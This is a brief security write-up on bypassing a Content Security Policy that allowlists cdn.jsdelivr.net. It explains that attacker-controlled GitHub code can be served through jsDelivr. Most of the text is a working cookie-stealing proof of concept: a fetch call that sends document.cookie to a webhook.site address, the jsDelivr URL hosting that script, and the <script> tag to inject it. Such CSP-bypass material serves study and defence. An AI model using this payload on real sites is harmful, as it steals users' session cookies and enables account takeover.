Content Security Policy (CSP)
Imagine a website that has the following Content Security Policy (CSP):
script-src 'self' https://cdn.jsdelivr.net ; style-src 'self' https://fonts.googleapis.com\; img-src 'self'; font-src 'self' https://fonts.gstatic.com\; child-src 'self'; frame-src 'self'; worker-src 'self'; frame-ancestors 'self'; form-action 'self'; base-uri 'self'; manifest-src 'self'
In this case, the website allows scripts from itself and jsDelivr. This allows us to load a script from jsDelivr and execute it.
Proof of Concept
We will create a simple fetch that send the cookie to our webhook.
fetch('https://webhook.site/ba970b96-508e-4d79-8b29-45a987954c90?c=' + document.cookie) We will upload this to a Github repository and host it through jsDelivr.
Result
We then use this format
https://cdn.jsdelivr.net/gh/USERNAME/REPOSITORY@COMMIT_HASH/FILE_PATH
My POC:
https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js
Then we can inject the script into the page and it will be executed.
<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>